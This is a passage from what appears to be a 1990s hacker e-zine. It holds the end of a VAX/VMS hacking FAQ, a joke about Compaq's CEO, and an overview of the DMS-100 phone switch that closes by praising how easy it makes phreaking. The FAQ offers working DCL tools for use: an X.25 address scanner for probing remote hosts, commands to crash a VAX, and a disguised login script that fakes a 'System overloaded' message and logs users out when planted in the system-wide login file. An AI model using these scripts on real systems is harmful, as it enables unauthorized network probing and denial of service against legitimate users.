VALUES END $ CLOSE VALUES $ LOG = "SCAN.LIS" $ TMP = "SCAN.TMP" $ OPEN/WRITE FILE 'LOG $ WRITE FILE "PREFIX:",PRE $ WRITE FILE "START :",DTE $ WRITE FILE "LAST :",END $LOOP: $ ON ERROR THEN GOTO OPEN $ SPAWN/NOWAIT/OUTPUT='TMP' SET HOST/X29 'PRE''DTE' $ WAIT 00:00:06 $ SPAWN_NAME = F$GETJPI("","USERNAME") $ SPAWN_NAME = F$EXTRACT(0,F$LOC(" ",SPAWN_NAME),SPAWN_NAME) + "_" $ CONTEXT = "" $FIND_PROC: $ PID = F$PID(CONTEXT) $ IF PID .EQS. "" THEN GOTO OPEN $ IF F$LOC(SPAWN_NAME,F$GETJPI(PID,"PRCNAM")) .EQ. 0 THEN STOP/ID='PID $ GOTO FIND_PROC $OPEN: $ ON ERROR THEN GOTO OPEN $ OPEN/READ PAD 'TMP $ MSSG = " Process stopped" $ ON ERROR THEN GOTO CLOSE $ READ PAD LINE $ IF F$LOC("call clear",LINE) .LT. F$LEN(LINE) THEN READ PAD LINE $ MSSG = F$EXTRACT(F$LOC(",",LINE)+1,80,LINE) $CLOSE: $ CLOSE PAD $ DELETE 'TMP';* $ IF F$LOC("obtain",MSSG).NE.F$LENGTH(MSSG) THEN GOTO NOCONN $ WRITE FILE PRE,DTE,MSSG $NOCONN: $ DTE = DTE + 1 $ IF DTE .LE. END THEN GOTO LOOP $ CLOSE FILE ( I don't have a clue by whom the code was written. ) then $ create scan.val prefix starting_NUA ending_NUA $ submit /noprint scan.com . . . $ search scan.lis "call connected" [10] " How do I crash a VAX !? " $ set default sys$system $ @shutdown or $ set default sys$system $ run opccrash [11] " I have a dostogiefski.cld file; what do I do with it ? " $ set command dostogiefski.cld [12] " Can I send messages to interactive processes ? " $ reply [/user=username] [/bell] [/id=xxxx] " Carlos Marigella " [13] " How can I prevent someone from phoning me all the time ? " $ set broadcast=(nophone) [14] " Can I postpone/disable interactive logins ? " $ set logins /interactive=0 $ set logins /interactive will display current value. Under the same `logic' : $ create innocent_filename.com $ set nocontrol $ context = "" $ pid = F$PID(context) $ user_name = F$GETJPI(pid,"username") $ wait 00:01:00.00 $ write sys$output "" $ write sys$output " System overloaded; please try again later " $ write sys$output " Logging out process ''pid', of user ''user_name' " $ write sys$output "" $ logout /full Add either to sys$system:sylogin.com or sys$login:login.com the following: " $ @innocent_filename.com ". [15] " How can I modify the welcome file ? Where is it held ? " $ set default sys$system $ edit welcome.txt [16] " I am editing a huge text file. How can I reach the end of it ? " at the editor's prompt type: *find end or *find "search string" [17] " How can I be sure than noone is watching me from a hidden process ? " $ show system /process VAX/VMS V5.5-2 on node STIRNER 30-MAR-1937 02:10:41.94 Uptime 2 03:05:25 Pid Process Name State Pri I/O CPU Page flts Ph.Mem . . . 00000114 SYMBIONT_4 HIB 5 290 0 00:00:19.05 1650 47 00000117 SMTP_SYMBIONT HIB 4 33398 0 00:16:49.67 246104 426 00000118 SYMBIONT_6 HIB 4 47868 0 00:05:09.01 296 121 00001255 SYMBIONT_0001 CUR 13 15 64293 0 00:05:08.12 1982 248 $ show system /full VAX/VMS V5.5-2 on node STIRNER 30-MAR-1937 02:10:59.64 Uptime 2 03:05:43 Pid Process Name State Pri I/O CPU Page flts Ph.Mem . . . 00000114 SYMBIONT_4 HIB 5 290 0 00:00:19.05 1650 47 [1,4] 00000117 SMTP_SYMBIONT LEF 5 33407 0 00:16:49.78 246116 502 [1,4] 00000118 SYMBIONT_6 HIB 5 47872 0 00:05:09.03 296 121 [1,4] 00001255 SYMBIONT_0001 CUR 13 15 64348 0 00:05:09.60 2063 268 [1,4] $ See the difference between system's SYMBIONT processes ( i.e. SYMBIONT_4, SYMBIONT_6, SMTP_SYMBIONT ) and the one created by using a `stealth' program ( SYMBIONT_0001 ); the names and the User Identification Codes may vary, but state, priority, physical memory used, page faults, input/output and Process IDentification numbers, can reveal, in combination, such a nastyness. Afterwards you may " show process /id=xxxx /continuous ", or " stop /id=xxxx ". [18] " Can I view the CPU usage of each process ? " $ monitor processes /topcpu will display a bar-chart of this kind. [19] Run the following .COM file and it will display information you'd possibly need on an account and/or node. It uses simple lexical functions. $ output :== write sys$output $ output "" $ node_id = F$CSID(context) $ nodename = F$GETSYI("nodename",,node_id) $ if F$GETSYI("cluster_member") .EQS. "TRUE" $ then output " ''nodename' is a member of a cluster. " $ else output " ''nodename' is not a member of a cluster. " $ context = "" $ username = F$GETJPI("","username") $ output " Username : ''username' " $ group = F$GETJPI("","grp") $ output " Group : ''group' " $ uic = F$USER() $ output " User Identification Code : ''uic' " $ pid = F$PID(context) $ output " Process IDentification : ''pid' " $ process = F$PROCESS() $ output " Process Name : ''process' " $ terminal = F$GETJPI("","terminal") $ output " Terminal Name : ''terminal' " $ priority = F$GETJPI("","authpri") $ output " Authorized Priority : ''priority' " $ maxjobs = F$GETJPI("","maxjobs") $ output " Maximum Number of Processes Allowed : ''maxjobs' " $ authpriv = F$GETJPI("","authpriv") $ output " Authorized Privileges : ''authpriv' " $ curpriv = F$GETJPI("","curpriv") $ output " Current Privileges : ''curpriv' " $ directory = F$DIRECTORY() $ output " Directory : ''directory' " $ protection = F$ENVIRONMENT("protection") $ output " Protection : ''protection' " $ boottime = F$GETSYI("boottime") $ output " Boot Time : ''boottime' " $ time = F$TIME() $ output " Current Time : ''time' " $ version = F$GETSYI("version") $ output " VMS version : ''version' " $ output "" You may : $ library /extract=(lexicals) /output=lexicals.hlp sys$help:helplib.hlb and then transfer lexicals.hlp. [20] " How can I view/modify my disk quota limit ? " DiskQuota was a standalone utility in versions prior to five; It is now a subset of the System Management utility, and thus you should : $ set def sys$system $ run sysman SYSMAN> diskquota show /device=dua1: [1,1] %SYSMAN-I-QUOTA, disk quota statistics on device DUA1: -- Node UIC Usage Permanent Quota Overdraft Limit [1,1] 123456 1500000 100 SYSMAN> diskquota modify /device=dua1: [1,1] /permquota=654321 /overdraft=1000 [END] Post Scriptum Some operations require privileges. ------------------------------------------------------------------------------ Compaq CEO blunders on TV Compaq CEO Eckard Pfeiffer last week visited The Netherlands to do some pr work. During a television interview for NOVA, a well known news show that aired last Friday, Pfeiffer claimed that pc's were easy to use, and could be used by virtually anyone. So, the reporter asked him to switch the tv channel on a Presario that was next to Pfeiffer that ran a Windows-based TV tuner. The result was Pfeifer frantically clicking on several menu bars, but instead of switching channels, he exited the program altogether. To make things worse, the reporter next asked him to start up a word processor. Again, Pfeiffer, clicked his way around the desktop, but couldn't find nor start the program. Finally, he was asked to start up a game. You saw Pfeifer (now in deep trouble) clicking on all the tabs of the "easy to use" tab-works interface that is included on all Presario's, looking for games, while muttering "Were are ze games? I can't find ze games on zis machine!!!", his accent becoming increasingly more German then before. It was almost like Dr. Strangelove. The last shot is of a Compaq tech support guy, rushing in to help him out.... So much for ease of use.... Voorburgwal 129, 1012 EP Amsterdam, The Netherlands). ------------------------------------------------------------------------------ Ok, I'm going to assume that you already know a little bit about what it is you're reading. The DMS100/IBN (integrated business network) is composed of mainly electronic business sets, phones, data units, and attendant consoles and units, all physically at the customers place of business. While the digital switching software and support hardware is located at the Telco. Together, in tandem they work to give the customer one of the best combinations of features and benefits. The DMS-100 combines voice AND data in one business comunications package. One of the many advantages is it offers the use with *any* sized business with up to 30,000 lines. The IBN system controls most operations, diagnoses problems, and also has the ability to do limited repairs on itself. Being modular, it can meet the needs at hand, and have the ability for new features, as time goes by, while still maintaining a cost-effective environment. Another advantage is that is uses a central attendant where and when needed. Along with Call Routing, or CDR, to control and restrict Long Distnace Calling, and network management. The IBN gives the user hassle free operation. Northern Telcom's DMS-100 switches, which by the way are digital, are frequently backed-up by their *higher trained* personnel, which isnt saying much. Some other features are: Automatic Routing Selection, or ARS, which routes the long distance calls, if they are even allowed, over the most economical (right) route available. Station Message Detail Recording, or SMDR, which basically does just what its name states, records long distance charges, including but not limited to, originating number, time and length of call, authorization code, and others... Yet another capability is the Direct Inward System Access (DISA), which gives the personnel the ability to use the system to place long distance calls cheaply, even from outside the company (sounds like a PBX a bit doesn't it?). System Features and Benefits: There are 6 Call Waiting Lamp Loop Keys, each with its associated source AND destination lamp to signify the status of both the calling and the called party status. The Second feature is Alpha Numeric Display Multiple Directory Number Feature Keys, up to 42 of them, which can be used for a Paging System, or speed dialing, and things along those lines. A third feature is the release Source/Release Destination Console, which features access to paging. Other features which mainly are unimportant I will list here, they are: Call Identifier Exclude Source/Exclude Destination. Remote Console Call Destination. Signal Source.Signal Destination. Call Holding. Call Detail Entry. Remote Console Call Selection. Console Display. Camp-on Automatic Recall Conference. A 6 port 2 way splitting non-delayed operation. Busy Verification of Lines. Manual and Automatic Hold. Multiple Console OPeration. Busy verification of trunks. Switched Loop Operation. Trunk Group Busy Indication. Uniform Call distribution form queue. Multiple listed directory numbers. Control of trunk group access. Secrecy. Night Service. Serial call. Speed Calling. Lockout. Delayed Operation. Position Busy. Interposition Calling. THrough Call Pickup. RIng Again. Multiple Directory Numbers. Intercom. Speed Call. Call Transfer/Conference. On-Hook Dialing. Additional Programmable Features include automatic hold. Listem-on hold. Multiple Appearance Directory Numbers, or MADN. Single Call Arrangement. Multiple Call Arrangement. Privacy Release. Tone Ringing with Volume Control. Call Waiting. Stored Number Redial. Private Business Line. And Finally a 32 character alphanumeric data unit. The DMS100/IBN can be used as a "standalone" or can be attached to the business set or other phone type unit. It has the ability to transmit over a two wire loop, at speeds of up to 56 kb per second, using a proprietary time compression multiplexing technology. The DMS100 is also available in different models to suit existing terminal capacities. It also provides integrated voice/data, that right data, communications. They, the phone company, and data unit, can operate together, simultaniously, or even independant of one another. Being fully digitized, it was one if the first switches to eliminate the use of those dinosaur analog modems (for which i still have a few if anyone wants to buy em off me or give me shipping money and ill send em to ya free). Well thats it for now. This should give you a good understanding of the capabilities of one of the many switches in use today. In fact, although outdated somewhat, my telco, citizens utilities, and one in stockton from what i just found out, is still using this switch (poor me in elk grove, ca eh?) which makes phreaking quite an easy task, not that it was really ever hard but anything to make it easier help. ANyway, if you have any comments/flames/general bullshit, mail it to either jmatrix@mindvox.phantom.com or capthook@sekurity.com the latter being a last resort email address. ciao ---Captain Hook ------------------------------------------------------------------------------